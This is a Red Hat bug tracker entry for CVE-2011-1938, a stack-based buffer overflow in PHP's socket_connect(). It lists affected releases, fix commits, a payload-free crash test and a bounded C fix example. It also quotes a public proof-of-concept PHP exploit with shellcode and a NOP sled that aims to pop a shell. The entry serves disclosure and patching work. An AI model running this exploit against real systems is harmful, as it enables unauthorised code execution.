Bug 709067 (CVE-2011-1938)
Summary: | CVE-2011-1938 php: stack-based buffer overflow in socket_connect() | ||
---|---|---|---|
Product: | [Other] Security Response | Reporter: | Jan Lieskovsky <jlieskov> |
Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
Status: | CLOSED ERRATA | QA Contact: | David Kutálek <dkutalek> |
Severity: | low | Docs Contact: | |
Priority: | low | ||
Version: | unspecified | CC: | bressers, dkutalek, fedora, jorton, rpm, vdanen |
Target Milestone: | --- | Keywords: | Security |
Target Release: | --- | ||
Hardware: | All | ||
OS: | Linux | ||
Whiteboard: | |||
Fixed In Version: | php 5.3.7 | Doc Type: | Bug Fix |
Doc Text: | Story Points: | --- | |
Clone Of: | Environment: | ||
Last Closed: | 2011-11-02 23:14:33 UTC | Type: | --- |
Regression: | --- | Mount Type: | --- |
Documentation: | --- | CRM: | |
Verified Versions: | Category: | --- | |
oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
Cloudforms Team: | --- | Target Upstream Version: | |
Embargoed: | |||
Bug Depends On: | 740731, 740732, 740733, 740734, 831135 | ||
Bug Blocks: | 715030 |
Description
Jan Lieskovsky
2011-05-30 14:01:58 UTC
This issue did not affect the versions of the php package, as shipped with Red Hat Enterprise Linux 4 and 5.

This issue affects the versions of the php53 package, as shipped with Red Hat Enterprise Linux 5.

This issue affects the versions of the php package, as shipped with Red Hat Enterprise Linux 6.

--

This issue affects the versions of the php package, as shipped with Fedora releases 13, 14 and 15.

Public PoC (from [1]):
======================

POC popping a shell:

-- cut --
```php
<?php
echo "[+] CVE-2011-1938";
echo "[+] there we go...\n";

define('EVIL_SPACE_ADDR', "\xff\xff\xee\xb3");
define('EVIL_SPACE_SIZE', 1024*1024*8);

$SHELLCODE =
    "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0".
    "\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1".
    "\xcd\x80";

echo "[+] creating the sled.\n";
$CODE = str_repeat("\x90", EVIL_SPACE_SIZE);
for ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1; $i < strlen($SHELLCODE); $i++, $j++) {
    $CODE[$j] = $SHELLCODE[$i];
}

$b = str_repeat("A", 196).EVIL_SPACE_ADDR;
$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1);

echo "[+] popping shell, have fun (if you picked the right address...)\n";
$var85 = socket_connect($var79, $b);
?>
```
-- cut --

---

As noted above, this issue did not affect php packages in Red Hat Enterprise Linux 4 and 5. This problem was introduced in the following commit:

http://svn.php.net/viewvc?view=revision&revision=262814
http://bugs.php.net/bug.php?id=44127

It affects php53 packages in Red Hat Enterprise Linux 5 and php packages in Red Hat Enterprise Linux 6.

As mentioned above, this overflow is caught by FORTIFY_SOURCE in both affected versions. This reduces the impact of this issue to a crash / abort and blocks code execution. The impact is further reduced by the fact that this problem affects AF_UNIX sockets. It's a lot less likely for a PHP script to accept an arbitrary untrusted address (file path) when connecting using an AF_UNIX socket than when doing a network connection using AF_INET or AF_INET6 sockets.

---

(In reply to comment #0)
> Upstream patch:
> [3] http://svn.php.net/viewvc?view=revision&revision=311369

Correction of the above commit:
http://svn.php.net/viewvc?view=revision&revision=311370

---

(In reply to comment #3)
> Public PoC (from [1]):

A minimal test case without any payload, that can be used to verify the problem, can look as:

```php
<?php
$sock = socket_create(AF_UNIX, SOCK_STREAM, 1);
var_dump(socket_connect($sock, str_repeat('A', 1024*1024)));
?>
```

---

This is corrected in upstream 5.3.7:
http://www.php.net/archive/2011.php#id2011-08-18-1

---

This issue has been addressed in the following products:

Red Hat Enterprise Linux 5
Red Hat Enterprise Linux 6

Via RHSA-2011:1423 https://rhn.redhat.com/errata/RHSA-2011-1423.html

---

Statement:

Not vulnerable. This issue did not affect the versions of php as shipped with Red Hat Enterprise Linux 4 and 5. It has been addressed in Red Hat Enterprise Linux 5 (php53) and 6 (php).
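The bug above is a copy of a caller-supplied AF_UNIX path into the fixed-size `sun_path` field without checking the path length first. The following is an added example, not code from the bug report or from PHP's ext/sockets, showing the bound that such a copy needs: the path must fit in `sizeof(sun_path)` including its terminating NUL, and anything longer is rejected rather than written to the stack.

```c
/* Added example: a bounded way to fill struct sockaddr_un from untrusted
 * input. The field size (sizeof sun_path), not the struct size, is the bound,
 * and one byte is reserved for the terminating NUL. This is an illustration
 * of the check that was missing, not the PHP project's own code. */
#include <stddef.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>

/* Does a path of path_len bytes (without NUL) fit in sun_path? */
int unix_path_fits(size_t path_len)
{
    return path_len < sizeof(((struct sockaddr_un *)0)->sun_path);
}

/* Fill *out from path/path_len. Returns 0 on success, -1 if the path is
 * too long (or an argument is NULL); on -1 nothing is written to *out. */
int build_unix_addr(const char *path, size_t path_len, struct sockaddr_un *out)
{
    if (path == NULL || out == NULL)
        return -1;
    if (!unix_path_fits(path_len))
        return -1;                      /* reject instead of overflowing */

    memset(out, 0, sizeof(*out));
    out->sun_family = AF_UNIX;
    memcpy(out->sun_path, path, path_len);
    out->sun_path[path_len] = '\0';    /* always NUL-terminated */
    return 0;
}
```

The same check applies whether the input comes from a script argument, a config file or a network peer; a caller that wants to connect would call `connect()` only after `build_unix_addr` returns 0.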